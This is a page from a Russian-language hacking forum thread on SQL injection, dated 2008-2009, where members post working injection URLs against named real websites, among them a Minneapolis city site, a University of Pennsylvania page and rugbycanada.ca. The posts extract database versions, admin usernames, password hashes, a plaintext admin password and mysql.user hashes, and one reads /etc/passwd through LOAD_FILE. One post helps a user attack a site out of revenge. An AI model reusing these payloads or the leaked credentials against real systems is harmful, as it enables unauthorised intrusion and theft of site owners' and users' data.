HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу SQL Инъекции
   
Ответ
Страница 1596 из 1602 « Первая < 5961096149615461586 1592 1593 1594 1595 1596 1597 1598 1599 1600 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 17.12.2008, 14:32
USAkid
Участник форума
Регистрация: 17.06.2008
Сообщений: 214
Провел на форуме:
964766

Репутация: 228
По умолчанию
.us

http://laneuse.ci.minneapolis.mn.us
Код:
http://laneuse.ci.minneapolis.mn.us/closure.php?pn=-1+union+select+1,2,3,version(),5+from+users--
version: 5.0.45
Код:
http://laneuse.ci.minneapolis.mn.us/closure.php?pn=-1+union+select+1,2,3,concat_ws(login,0x3a,password),5+from+users--
Login : pass

jason:566cae743de1911e (MySQL type, расшифровать не удалось)

http://www.turkuaz.us
Код:
http://www.turkuaz.us:80/news_det.php?newsId=1333&catId=-32+union+select+1,version(),3,4--
version: 4.1.22
user: turkuaz-us@89.106.12.59
Подобрал единственную таблицу turkuazus.customers, но дальше подроб не пошел (...

http://www.mugama.com
Код:
http://www.mugama.com/profile.php?recordID=-1+union+select+1,version(),3,4,5,6--
version: 5.0.51a-community

Код:
http://www.mugama.com/profile.php?recordID=-1+union+select+1,concat_ws(user_name,0x3a,user_password),3,4,5,6+from+tbl_user--
admin:43e9a4ab75570f5b:admin
Последний раз редактировалось USAkid; 17.12.2008 в 14:36..
 
Ответить с цитированием

  #2  
Старый 23.12.2008, 14:08
0xA1isa
Новичок
Регистрация: 19.06.2007
Сообщений: 8
Провел на форуме:
218478

Репутация: 23
По умолчанию
Цитата:
Сообщение от westside  
Народ, я в sql inj новичёк, на этом сайте http://hyip365.net с лева есть форма поиска я ввожу туда xss "><script>alert('alert')</script> и выдаёт sql error. Помогите его взломать, админ сайта хакер, убил мой сайт, админ или американец или китаец, народ, покажите ему как русские хакеры взламывают!
Я над ним уже немного поработал, многие ссылки уже не работают....
тут скл-инъекция:
Код:
'=0) union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,version(),30,31,32/*
версия 4.1.22-max-log

а дальше - сами....
 
Ответить с цитированием

  #3  
Старый 24.12.2008, 08:03
R1dex
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме:
1571865

Репутация: 571
По умолчанию
Цитата:
Сообщение от Thrasher88  
Подскажите, как раскрутить?? не получается выявить кол-во полей
Это не скуля..

Цитата:
Сообщение от mailbrush  
Есть...
Код:
http://www.pascucci.ru/index.php?id=-99999999+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15/*
Всё правильно сказал -=Razor=-, нету там скули. Вы про разные сайты говорите.
Перечитай внимательно.
__________________________________________________ _______

"Компания КИТ. "
"Надежны во всём!"


Код:
http://www.kitcom.ru/goods/?gm=-1+union+select+1,2,3+from+mysql.user--
root : 2b8abcb448fbc2f9 : wwwsql1

Так же есть табличка - users.
 
Ответить с цитированием

  #4  
Старый 30.12.2008, 00:14
Jokester
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию
vladvk Это фильтрация "+", " ", не знаю , может ещё чего не смотрел )
http://www.ac-alp.ru/part/index.php?id=-41/**/union/**/select/**/1,2,concat_ws(0x3a,User(),Database(),Version()),4, 5,6,7

PS Вопросы в соседней теме (на будующее)
PPS
Цитата:
Сообщение от -m0rgan-  
Нету прав...
Я же Вас просил. не писать охинею
Последний раз редактировалось jokester; 30.12.2008 в 00:22..
 
Ответить с цитированием

  #5  
Старый 07.02.2009, 01:56
viaman
Новичок
Регистрация: 27.11.2008
Сообщений: 4
Провел на форуме:
52419

Репутация: 3
По умолчанию
http://www.facilities.upenn.edu/mapsBldgs/view_map.php3?id=-44+union+select+1,2,3,4,version(),6,7,8,9,10,11--
 
Ответить с цитированием

  #6  
Старый 07.02.2009, 04:23
pinky07
Познающий
Регистрация: 02.01.2009
Сообщений: 55
Провел на форуме:
393715

Репутация: 90
По умолчанию
http://www.photokzn.ru

так находим таблицу с пользователями:
http://www.photokzn.ru/?cat=new&id=3931'+and+ascii(substring((SELECT+tabl e_name+FROM+information_schema.tables+WHERE+table_ name+like+char(37,117,115,101,114,37)+limit+2,1),1 ,1))='117 = u
http://www.photokzn.ru/?cat=new&id=3931'+and+ascii(substring((SELECT+tabl e_name+FROM+information_schema.tables+WHERE+table_ name+like+char(37,117,115,101,114,37)+limit+2,1),2 ,1))='115 = s
http://www.photokzn.ru/?cat=new&id=3931'+and+ascii(substring((SELECT+tabl e_name+FROM+information_schema.tables+WHERE+table_ name+like+char(37,117,115,101,114,37)+limit+2,1),3 ,1))='101 = e
http://www.photokzn.ru/?cat=new&id=3931'+and+ascii(substring((SELECT+tabl e_name+FROM+information_schema.tables+WHERE+table_ name+like+char(37,117,115,101,114,37)+limit+2,1),4 ,1))='114 = r
http://www.photokzn.ru/?cat=new&id=3931'+and+ascii(substring((SELECT+tabl e_name+FROM+information_schema.tables+WHERE+table_ name+like+char(37,117,115,101,114,37)+limit+2,1),5 ,1))='115 = s
http://www.photokzn.ru/?cat=new&id=3931'+and+ascii(substring((SELECT+tabl e_name+FROM+information_schema.tables+WHERE+table_ name+like+char(37,117,115,101,114,37)+limit+2,1),6 ,1))='0
таблица users


находим колонку с паролями:
http://www.photokzn.ru/?cat=new&id=3931'+and+ascii(substring((SELECT+colu mn_name+FROM+information_schema.columns+WHERE+tabl e_name=0x7573657273+limit+3,1),1,1))='112 = p
http://www.photokzn.ru/?cat=new&id=3931'+and+ascii(substring((SELECT+colu mn_name+FROM+information_schema.columns+WHERE+tabl e_name=0x7573657273+limit+3,1),2,1))='97 = a
http://www.photokzn.ru/?cat=new&id=3931'+and+ascii(substring((SELECT+colu mn_name+FROM+information_schema.columns+WHERE+tabl e_name=0x7573657273+limit+3,1),3,1))='115 = s
http://www.photokzn.ru/?cat=new&id=3931'+and+ascii(substring((SELECT+colu mn_name+FROM+information_schema.columns+WHERE+tabl e_name=0x7573657273+limit+3,1),4,1))='115 = s
http://www.photokzn.ru/?cat=new&id=3931'+and+ascii(substring((SELECT+colu mn_name+FROM+information_schema.columns+WHERE+tabl e_name=0x7573657273+limit+3,1),5,1))='0
колонка pass


находим колонку с логинами:
http://www.photokzn.ru/?cat=new&id=3931'+and+ascii(substring((SELECT+colu mn_name+FROM+information_schema.columns+WHERE+tabl e_name=0x7573657273+limit+2,1),1,1))='108 = l
http://www.photokzn.ru/?cat=new&id=3931'+and+ascii(substring((SELECT+colu mn_name+FROM+information_schema.columns+WHERE+tabl e_name=0x7573657273+limit+2,1),2,1))='111 = o
http://www.photokzn.ru/?cat=new&id=3931'+and+ascii(substring((SELECT+colu mn_name+FROM+information_schema.columns+WHERE+tabl e_name=0x7573657273+limit+2,1),3,1))='103 = g
http://www.photokzn.ru/?cat=new&id=3931'+and+ascii(substring((SELECT+colu mn_name+FROM+information_schema.columns+WHERE+tabl e_name=0x7573657273+limit+2,1),4,1))='105 = i
http://www.photokzn.ru/?cat=new&id=3931'+and+ascii(substring((SELECT+colu mn_name+FROM+information_schema.columns+WHERE+tabl e_name=0x7573657273+limit+2,1),5,1))='110 = n
http://www.photokzn.ru/?cat=new&id=3931'+and+ascii(substring((SELECT+colu mn_name+FROM+information_schema.columns+WHERE+tabl e_name=0x7573657273+limit+2,1),6,1))='0
колонка login

Теперь вывод логина:
http://www.photokzn.ru/?cat=new&id=3931'+and+ascii(substring((SELECT+logi n+FROM+users+limit+0,1),1,1))='97 a
http://www.photokzn.ru/?cat=new&id=3931'+and+ascii(substring((SELECT+logi n+FROM+users+limit+0,1),2,1))='100 d
http://www.photokzn.ru/?cat=new&id=3931'+and+ascii(substring((SELECT+logi n+FROM+users+limit+0,1),3,1))='109 m
http://www.photokzn.ru/?cat=new&id=3931'+and+ascii(substring((SELECT+logi n+FROM+users+limit+0,1),4,1))='105 i
http://www.photokzn.ru/?cat=new&id=3931'+and+ascii(substring((SELECT+logi n+FROM+users+limit+0,1),5,1))='110 n
http://www.photokzn.ru/?cat=new&id=3931'+and+ascii(substring((SELECT+logi n+FROM+users+limit+0,1),6,1))='0
логин админа - admin


вывод пароля из users где имя пользователя admin
http://www.photokzn.ru/?cat=new&id=3931'+and+ascii(substring((SELECT+pass +FROM+users+where+login=0x61646d696e),1,1))='116 = t
http://www.photokzn.ru/?cat=new&id=3931'+and+ascii(substring((SELECT+pass +FROM+users+where+login=0x61646d696e),2,1))='104 = h
http://www.photokzn.ru/?cat=new&id=3931'+and+ascii(substring((SELECT+pass +FROM+users+where+login=0x61646d696e),3,1))='105 = i
http://www.photokzn.ru/?cat=new&id=3931'+and+ascii(substring((SELECT+pass +FROM+users+where+login=0x61646d696e),4,1))='115 = s
http://www.photokzn.ru/?cat=new&id=3931'+and+ascii(substring((SELECT+pass +FROM+users+where+login=0x61646d696e),5,1))='116 = t
http://www.photokzn.ru/?cat=new&id=3931'+and+ascii(substring((SELECT+pass +FROM+users+where+login=0x61646d696e),6,1))='105 = i
http://www.photokzn.ru/?cat=new&id=3931'+and+ascii(substring((SELECT+pass +FROM+users+where+login=0x61646d696e),7,1))='109 = m
http://www.photokzn.ru/?cat=new&id=3931'+and+ascii(substring((SELECT+pass +FROM+users+where+login=0x61646d696e),8,1))='101 = e
http://www.photokzn.ru/?cat=new&id=3931'+and+ascii(substring((SELECT+pass +FROM+users+where+login=0x61646d696e),9,1))='0
пароль админа thistime

P.s. Там на сайте 5 версия MySQL, можно было бы провести иньекцию по другому, но я не ищу легких путей!!!!=))
 
Ответить с цитированием

  #7  
Старый 08.02.2009, 15:05
Kraneg
Участник форума
Регистрация: 30.08.2008
Сообщений: 132
Провел на форуме:
1351948

Репутация: 325
По умолчанию
rugbycanada.ca
Код:
http://www.rugbycanada.ca/index.php?lang=en&page_id=10&news_id=-4464+UNION+SELECT+1,concat_ws(0x3a,version(),database(),user
()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19/*
PR7
Version:4.0.27
DB:rugbyca
user:rugbyca@localhost

Так же можем прочитать логин и пароль админа:
Код:
http://www.rugbycanada.ca/index.php?lang=en&page_id=10&news_id=-4464+UNION+SELECT+1,concat_ws
(0x3a,id,user_name,user_password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+FROM+administrators/*
Только как-то пароль странно вывел или с солью или не понятно вообще что это =)
1:rugbyca:0f9c80a8014a66940ce454df4fcac581:b2
 
Ответить с цитированием

  #8  
Старый 08.02.2009, 15:42
pinky07
Познающий
Регистрация: 02.01.2009
Сообщений: 55
Провел на форуме:
393715

Репутация: 90
По умолчанию
vkazan.ru

юзер:
http://vkazan.ru/city/sights/index.html?id=560+and+ascii(lower(substring(user() ,1,1)))=112 = p
http://vkazan.ru/city/sights/index.html?id=560+and+ascii(lower(substring(user() ,2,1)))=111 = o
http://vkazan.ru/city/sights/index.html?id=560+and+ascii(lower(substring(user() ,3,1)))=119 = w
http://vkazan.ru/city/sights/index.html?id=560+and+ascii(lower(substring(user() ,4,1)))=101 = e
http://vkazan.ru/city/sights/index.html?id=560+and+ascii(lower(substring(user() ,5,1)))=114 = r
http://vkazan.ru/city/sights/index.html?id=560+and+ascii(lower(substring(user() ,6,1)))=95 = _
http://vkazan.ru/city/sights/index.html?id=560+and+ascii(lower(substring(user() ,7,1)))=103 = g
http://vkazan.ru/city/sights/index.html?id=560+and+ascii(lower(substring(user() ,8,1)))=111 = o
http://vkazan.ru/city/sights/index.html?id=560+and+ascii(lower(substring(user() ,9,1)))=114 = r
http://vkazan.ru/city/sights/index.html?id=560+and+ascii(lower(substring(user() ,10,1)))=111 = o
http://vkazan.ru/city/sights/index.html?id=560+and+ascii(lower(substring(user() ,11,1)))=100 = d
http://vkazan.ru/city/sights/index.html?id=560+and+ascii(lower(substring(user() ,12,1)))=97 = a
http://vkazan.ru/city/sights/index.html?id=560+and+ascii(lower(substring(user() ,13,1)))=64 = @
http://vkazan.ru/city/sights/index.html?id=560+and+ascii(lower(substring(user() ,14,1)))=108 = l
http://vkazan.ru/city/sights/index.html?id=560+and+ascii(lower(substring(user() ,15,1)))=111 = o
http://vkazan.ru/city/sights/index.html?id=560+and+ascii(lower(substring(user() ,16,1)))=99 = c
http://vkazan.ru/city/sights/index.html?id=560+and+ascii(lower(substring(user() ,17,1)))=97 = a
http://vkazan.ru/city/sights/index.html?id=560+and+ascii(lower(substring(user() ,18,1)))=108 = l
http://vkazan.ru/city/sights/index.html?id=560+and+ascii(lower(substring(user() ,19,1)))=104 = h
http://vkazan.ru/city/sights/index.html?id=560+and+ascii(lower(substring(user() ,20,1)))=111 = o
http://vkazan.ru/city/sights/index.html?id=560+and+ascii(lower(substring(user() ,21,1)))=115 = s
http://vkazan.ru/city/sights/index.html?id=560+and+ascii(lower(substring(user() ,22,1)))=116 = t
http://vkazan.ru/city/sights/index.html?id=560+and+ascii(lower(substring(user() ,23,1)))=0

[B]бд:[/B]
http://vkazan.ru/city/sights/index.html?id=560+and+ascii(lower(substring(databa se(),1,1)))=112 = p
http://vkazan.ru/city/sights/index.html?id=560+and+ascii(lower(substring(databa se(),2,1)))=111 = o
http://vkazan.ru/city/sights/index.html?id=560+and+ascii(lower(substring(databa se(),3,1)))=119 = w
http://vkazan.ru/city/sights/index.html?id=560+and+ascii(lower(substring(databa se(),4,1)))=101 = e
http://vkazan.ru/city/sights/index.html?id=560+and+ascii(lower(substring(databa se(),5,1)))=114 = r
http://vkazan.ru/city/sights/index.html?id=560+and+ascii(lower(substring(databa se(),6,1)))=95 = _
http://vkazan.ru/city/sights/index.html?id=560+and+ascii(lower(substring(databa se(),7,1)))=103 = g
http://vkazan.ru/city/sights/index.html?id=560+and+ascii(lower(substring(databa se(),8,1)))=111 = o
http://vkazan.ru/city/sights/index.html?id=560+and+ascii(lower(substring(databa se(),9,1)))=114 = r
http://vkazan.ru/city/sights/index.html?id=560+and+ascii(lower(substring(databa se(),10,1)))=111 = o
http://vkazan.ru/city/sights/index.html?id=560+and+ascii(lower(substring(databa se(),11,1)))=100 = d
http://vkazan.ru/city/sights/index.html?id=560+and+ascii(lower(substring(databa se(),12,1)))=97 = a
http://vkazan.ru/city/sights/index.html?id=560+and+ascii(lower(substring(databa se(),13,1)))=0

версия MySQL - 5
http://vkazan.ru/city/sights/index.html?id=560+and+(substring(version(),1,1))=5

p.s. нет выводимых полей, опять пришлось через подзапросы все делать=)
 
Ответить с цитированием

  #9  
Старый 08.02.2009, 16:36
Kraneg
Участник форума
Регистрация: 30.08.2008
Сообщений: 132
Провел на форуме:
1351948

Репутация: 325
По умолчанию
commencementflowers.com - PR3
Код:
http://www.commencementflowers.com/flowers_catalog/index.php?id=fuck%27+UNION+SELECT+concat_ws(0x3a,version(),user(),database())/*
Version: 4.0.24-standard-log
User: convflow@10.105.0.6
DB name: convflow

Админка:
Код:
http://www.commencementflowers.com/flowers_catalog/admin/
Но к сожалению или к счастью basic авторизация =)
 
Ответить с цитированием

  #10  
Старый 14.02.2009, 10:29
Kraneg
Участник форума
Регистрация: 30.08.2008
Сообщений: 132
Провел на форуме:
1351948

Репутация: 325
По умолчанию
uchri.org - PR7
Код:
http://www.uchri.org/page-home.php?page_id=1289&cat_id=2+UNION+SELECT+1,2,AES_DECRYPT(AES_ENCRYPT(concat_ws(0x3a,version(),user(),database()),73),73),4,5,6,7/*
DB_Ver : 4.1.13-log
DB_User : root@localhost
DB : uchri_website

Выведем пользователей, благо выводятся все и сразу =)
Код:
http://www.uchri.org/page-home.php?page_id=1289&cat_id=2+UNION+SELECT+1,2,AES_DECRYPT(AES_ENCRYPT(concat_ws(0x3a,user,password),73),73),4,5,6,7+from+mysql.user/*
root:*3E9CBCAC089CD40647357E4F6468CF7A8FCDC6C5
bahacal:*EF6AE544D8B7CC6B225A461C0EB6C8E72DF68ED1
mario:*C0110649C935092BAB4CC0D1897ED4A4680CD3FA
uchri_user:*D639800883740738B468A3FE6FF4D34EE25FD1 5E

Читаем файлы /etc/passwd:
Код:
http://www.uchri.org/page-home.php?page_id=1289&cat_id=2+UNION+SELECT+1,2,AES_DECRYPT(AES_ENCRYPT(LOAD_FILE(0x2f6574632f706173737764),73),73),4,5,6,7/*
 
Ответить с цитированием
Ответ
Страница 1596 из 1602 « Первая < 5961096149615461586 1592 1593 1594 1595 1596 1597 1598 1599 1600 > Последняя »



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.